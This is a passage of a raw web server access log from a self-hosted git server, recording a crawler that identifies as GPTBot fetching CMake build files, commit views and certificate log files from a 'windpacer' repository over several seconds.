"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11184] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13164] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10003] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2flink.txt" [Client 74.7.227.38] [Length 22772] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11153] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11182] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13887] [Gzip 8.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13917] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13180] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10210] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10235] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32842] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 966] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 936] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11557] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10448] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13918] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:29:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:29:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log" +[17/Feb/2026:16:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14251] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11282] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11650] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16055] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12166] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11324] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 